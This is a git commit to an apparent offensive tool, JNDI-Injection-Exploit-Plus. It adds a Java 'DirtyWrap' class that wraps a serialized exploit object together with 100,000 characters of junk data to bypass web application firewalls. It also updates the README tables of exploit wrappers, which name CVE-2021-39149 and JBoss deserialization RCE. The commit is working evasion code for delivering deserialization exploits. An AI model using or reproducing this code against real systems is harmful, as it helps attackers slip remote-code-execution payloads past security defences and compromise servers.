Add DirtyWrap: Insert a lot of dirty data to bypass WAF

cckuailong · cckuailong · commit 49f7d43f2e01 · 2024-03-08T09:39:47.000+08:00
diff --git a/README.md b/README.md
@@ -131,6 +131,8 @@ Wrapper | Example Vuls
 Xstream | CVE-2021-39149
 Apereo  | Apereo 4.1 Deserialization RCE
 JbossRemoting | Jboss Remoting Port Unserialization
+Gzip | Some yonyou interface use Gzip
+Dirty | Insert a lot of dirty data to bypass WAF
 
 - Example
 
diff --git a/README_zh.md b/README_zh.md
@@ -108,6 +108,8 @@ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "<ip>:<port>" -D "
 Xstream | CVE-2021-39149
 Apereo  | Apereo 4.1 反序列化漏洞
 JbossRemoting | Jboss Remoting 服务反序列化
+Gzip | 用友组件的一些接口使用Gzip
+Dirty | 插入大量脏数据来绕过WAF检测
 
 - 示例
 
diff --git a/pom.xml b/pom.xml
@@ -6,7 +6,7 @@
 
     <groupId>cckuailong</groupId>
     <artifactId>JNDI-Injection-Exploit-Plus</artifactId>
-    <version>2.3-SNAPSHOT</version>
+    <version>2.4-SNAPSHOT</version>
 
     <properties>
         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
diff --git a/src/main/java/wrappers/DirtyWrap.java b/src/main/java/wrappers/DirtyWrap.java
@@ -0,0 +1,58 @@
+package wrappers;
+
+import common.Serializerable;
+
+import java.io.IOException;
+import java.util.*;
+
+public class DirtyWrap implements ObjectWrapper<byte[]> {
+    public byte[] wrap(Object obj) throws IOException {
+        Object wrapper = null;
+
+        String dirtyData = getLongString(100000);
+        int type = (int)(Math.random() * 5) % 5 + 1;
+        switch (type){
+            case 0:
+                List<Object> arrayList = new ArrayList<Object>();
+                arrayList.add(dirtyData);
+                arrayList.add(obj);
+                wrapper = arrayList;
+                break;
+            case 1:
+                List<Object> linkedList = new LinkedList<Object>();
+                linkedList.add(dirtyData);
+                linkedList.add(obj);
+                wrapper = linkedList;
+                break;
+            case 2:
+                HashMap<String,Object> map = new HashMap<String, Object>();
+                map.put("a", dirtyData);
+                map.put("b", obj);
+                wrapper = map;
+                break;
+            case 3:
+                LinkedHashMap<String,Object> linkedHashMap = new LinkedHashMap<String,Object>();
+                linkedHashMap.put("a", dirtyData);
+                linkedHashMap.put("b", obj);
+                wrapper = linkedHashMap;
+                break;
+            default:
+            case 4:
+                TreeMap<String,Object> treeMap = new TreeMap<String, Object>();
+                treeMap.put("a", dirtyData);
+                treeMap.put("b", obj);
+                wrapper = treeMap;
+                break;
+        }
+
+        return Serializerable.serialize(wrapper);
+    }
+
+    public static String getLongString(int length){
+        StringBuilder str = new StringBuilder();
+        for (int i=0;i<length;i++){
+            str.append("x");
+        }
+        return str.toString();
+    }
+}
